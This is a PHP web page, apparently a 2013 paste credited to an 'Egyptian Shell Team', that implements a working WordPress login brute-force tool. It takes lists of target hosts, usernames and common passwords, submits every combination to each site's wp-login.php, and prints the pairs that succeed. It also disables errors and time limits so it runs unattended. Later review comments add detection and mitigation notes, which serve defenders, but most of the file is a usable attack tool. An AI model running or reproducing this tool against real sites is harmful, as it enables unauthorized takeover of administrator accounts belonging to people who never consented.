87aCk_X

WordPress Admin Panel Brute Force Attacks

Sep 29th, 2013
<?php
// Emit the tool's banner and licence notice as an HTML comment at the very top of the response.
echo "
<!--
WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing
Powered By Dr.FarFar
PS: This Tool is For Penetration Testing And Educational Purpose, Dr.FarFar Is Not Responsible At Any Bad Using For This Tool.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
-->
";

// Turn off all PHP error reporting for this request.
error_reporting(0);
// Remove the script execution time limit.
set_time_limit(0);
// Keep executing even after the requesting browser disconnects.
ignore_user_abort(true);
// NOTE(review): these three settings together let the script run silently for as long as
// its loops take. Finding this trio at the top of an unexpected PHP file in a web root is
// a useful triage signal when examining a host.
?>
  19. <html>
  20. <head>
  21. <title> | </title>
  22.  
  23. <HEAD>
  24.  
  25. <SCRIPT LANGUAGE="JavaScript">
  26.  
  27. <!-- Begin
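// Title-bar banner animation. Cosmetic only: it rotates the strings below
// through document.title and has no part in the requests the PHP code sends.
var message = new Array();
// Set your messages below -- follow the pattern.
// To add more messages, just add more elements to the array.
message[0] = "WordPress Admin Panel Brute Force Attacks";
message[1] = "Powered By Dr.FarFar";
message[2] = "Egyptian Shell Team Penetration Testing";
message[3] = "Egyptian Shell Team";
message[4] = "Powered By Dr.FarFar";
message[5] = "Egyptian Shell Team Penetration Testing";
message[6] = "Powered By Dr.FarFar";

// Number of times the eight-frame cycle repeats for each message.
var reps = 2;
var speed = 200;  // Delay between frames, passed to setTimeout (larger = slower).

// Animation state, kept as globals exactly as in the original script.
var p = message.length;  // number of messages
var T = "";              // message currently displayed
var C = 0;               // frames scheduled so far for the current message
var mC = 0;              // index of the current message
var s = 0;               // current frame number, 1..8
var sT = null;           // handle returned by the last setTimeout call
if (reps < 1) reps = 1;

/** Load the current message and start its frame cycle. */
function doTheThing() {
  T = message[mC];
  A();
}

/**
 * Draw the next frame into document.title, then either schedule the following
 * frame or, once 8 * reps frames have been scheduled, advance to the next message.
 */
function A() {
  // Left and right decorations for frames 1..8; frames 6-8 replay frames 4-2.
  var frames = [
    ['||||||====||[ ', ' ]||====||||||'],
    ['|||=|||===||[ ', ' ]||===|||=|||'],
    ['|||==|||==||[ ', ' ]||==|||==|||'],
    ['|||===|||=||[ ', ' ]||=|||===|||'],
    ['|||====|||||[ ', ' ]|||||====|||'],
    ['|||===|||=||[ ', ' ]||=|||===|||'],
    ['|||==|||==||[ ', ' ]||==|||==|||'],
    ['|||=|||===||[ ', ' ]||===|||=|||']
  ];

  s++;
  if (s > 8) { s = 1; }
  document.title = frames[s - 1][0] + T + frames[s - 1][1];

  if (C < (8 * reps)) {
    // Pass the function itself: a string argument is evaluated like eval()
    // and is refused under a Content-Security-Policy without 'unsafe-eval'.
    sT = setTimeout(A, speed);
    C++;
  }
  else {
    // Cycle finished for this message: reset the counters and wrap the index.
    C = 0;
    s = 0;
    mC++;
    if (mC > p - 1) mC = 0;
    sT = null;
    doTheThing();
  }
}
doTheThing();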
  82. //  End -->
  83. </script>
  84.  
  85. <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8>
  86.  
  87. <style type="text/css">
  88. body {
  89.         color: white;
  90.         background-image: url(http://i283.photobucket.com/albums/kk281/fjachel/Black-background.gif);
  91. }
  92. textarea {
  93.         border-radius: 8px;
  94.         color: white;
  95.         background-color:black;
  96. }
  97. input[type=submit] , .submit{
  98.                 background-color:black;
  99.                 color:white;
  100.                 border-radius:8px;
  101. }
  102. p {
  103.         font-size: 10px;
  104.         text-align: center;
  105. }
  106. a:link,a:hover,a:visited {
  107.         color:pink;
  108. }
  109. </style>
  110. </head>
  111. <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
  112. <center>
  113. <p><a href="http://9eg.blogspot.com" target="_blank"><img
  114.  
  115. src="http://im37.gulfup.com/VLNdW.png"
  116.  
  117. border="0"/></a></p>
  118. <form enctype="multipart/form-data" method="POST">
  119.   <table width='624' border='0' id='Box'>
  120.     <tr>
  121. <td width='4%'>&nbsp;</td>
  122. <p><span style="color:#FFFF00;"><span style="font-size:28px;"><strong>WordPress Admin Panel</strong> <strong style="margin: 0px; padding: 0px; border: 0px; font-style: inherit; line-height: inherit; font-family: inherit;">Brute Force Attacks</strong></span></span></p>
  123.     <tr>
  124.       <td >&nbsp;</td>
  125.       <td ><b><p>Hosts:</p></b></td>
  126.       <td ><b><p> Users:</p></b></td>
  127.       <td ><b><p>Passwords:</p></b></td>
  128.     </tr>
  129.     <tr>
  130.       <td>&nbsp;</td>
  131.       <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
  132.       <td ><textarea name="usernames" cols="30" rows="10"  ><?php if($_POST){echo $_POST['usernames'];}else {echo
  133.  
  134. "admin\nadministrator";} ?></textarea></td>
  135.       <td ><textarea name="passwords" cols="30" rows="10"  ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td>
  136.     </tr>
  137. <tr><td colspan="4"><input type="submit" name="submit" value="[ Attack Now ]"  />
<?php
// Form handler: runs only when the page was requested with a non-empty POST body.
// For every submitted host it tries each username/password pair against that host's
// wp-login.php and prints one result line per host.
// NOTE(review): what this produces on the receiving site is a burst of POSTs to
// /wp-login.php from a single client, one per credential pair. Login rate limiting or
// lockout, multi-factor authentication, and admin passwords that appear on no common
// list (such as the default list in the form above) are the controls that counter it.
if($_POST)
{
        // filter() is defined further down in this file; it strips slashes when magic quotes are on.
        $hosts = trim(filter($_POST['hosts']));
        $passwords = trim(filter($_POST['passwords']));
        $usernames = trim(filter($_POST['usernames']));

        // All three fields must be non-empty (PHP truthiness, so the string "0" also counts as empty).
        if($passwords && $usernames && $hosts)
        {
                // One list entry per line of each textarea.
                $hosts_explode = explode("\n", $hosts);
                $usernames_explode = explode("\n", $usernames);
        $passwords_explode = explode("\n", $passwords);

                foreach($hosts_explode as $host)
                {
                        // Normalise the host: drop one trailing slash, remove any "http://",
                        // "https://" and "www." substrings, then force the http:// scheme.
                        // Every request below therefore goes out over plain HTTP.
                        $host = RemoveLastSlash($host);
                        $hacked = 0; // set to 1 once a credential pair is accepted for this host
                        $host = str_replace(array("http://","https://","www."),"",trim($host));
                        $host = "http://".$host;
                        $wpAdmin = $host.'/wp-admin/';

                        // Skip hosts whose /wp-login.php does not answer with HTTP 200
                        // (see url_exists() later in this file).
                        if(!url_exists($host."/wp-login.php"))
                        {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush

();continue;}

                        foreach($usernames_explode as $username)
                        {
                                foreach($passwords_explode as $password)
                                {
                                        // A new cURL handle is created for every attempt; there is
                                        // no matching curl_close() in this loop.
                                        $ch   =     curl_init();
                                        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
                                        curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
                                        // Cookies are kept in "coki.txt", a relative path, so the file is
                                        // created in the script's working directory.
                                        // NOTE(review): a stray coki.txt next to an unknown PHP file is a
                                        // host-side artefact worth checking for during incident response.
                                        curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
                                        curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
                                        curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
                                        curl_setopt($ch,CURLOPT_POST,TRUE);
                                        // Login form body: log, pwd, wp-submit, redirect_to, testcookie.
                                        // NOTE(review): "wp-submit=Giri?" and "testcookie=1" are constant
                                        // across attempts and redirect_to is always http://<host>/wp-admin/;
                                        // where request bodies are inspected (WAF, reverse proxy) these
                                        // constants can serve as a signature for this tool.
                                        curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".

$password."&wp-submit=Giri?"."&redirect_to=".$wpAdmin."&testcookie=1");
                                        $login    =        curl_exec($ch);

                                        // An attempt counts as successful when the returned page, after
                                        // redirects are followed, contains "profile.php" (case-insensitive).
                                        if(eregi ("profile.php",$login) )
                                        {
                                                $hacked = 1;
                                                // NOTE(review): host, username and password are written into the
                                                // HTML response without escaping.
                                                echo "<p>".$host." => UserName : [<font color='green'>".

$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
                                                ob_flush();flush();break;
                                        }
                                }
                                // Stop trying further usernames for this host after the first hit.
                                if($hacked == 1){break;}
                        }
                        // No pair was accepted for this host.
                        if($hacked == 0)
                        {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
                }
        }
        else {echo "<p><b><font color='red'>All fields are Required ! </font></b></p>";}
}
?>
  198. </td></tr>
  199. </table></form>
  200.  
  201. <!-- Dr.FarFar | WordPress Admin Panel Brute Force Attacks | Egyptian Shell Team Penetration Testing -->
  202. <p><strong>Powered By <a href="http://9eg.blogspot.com">Dr.FarFar</a></strong></p>
  203.  
  204. </center>
  205. <p>
  206.   <?php
  207. function url_exists($strURL)
  208. {
  209.     $resURL = curl_init();
  210.     curl_setopt($resURL, CURLOPT_URL, $strURL);
  211.     curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  212.     curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  213.     curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  214.     curl_exec ($resURL);
  215.     $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  216.     curl_close ($resURL);
  217.     if ($intReturnCode != 200){return false;}
  218.         else{return true ;}
  219. }
  220. function filter($string)
  221. {
  222.         if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  223.         else{return $string;    }
  224. }
  225. function RemoveLastSlash($host)
  226. {
  227.         if(strrpos($host, '/', -1) == strlen($host)-1)
  228.         {return substr($host,0,strrpos($host, '/', -1));}
  229.         else{return $host;}
  230. }
  231. ?>
  232. <?php  echo "</p>"; ?>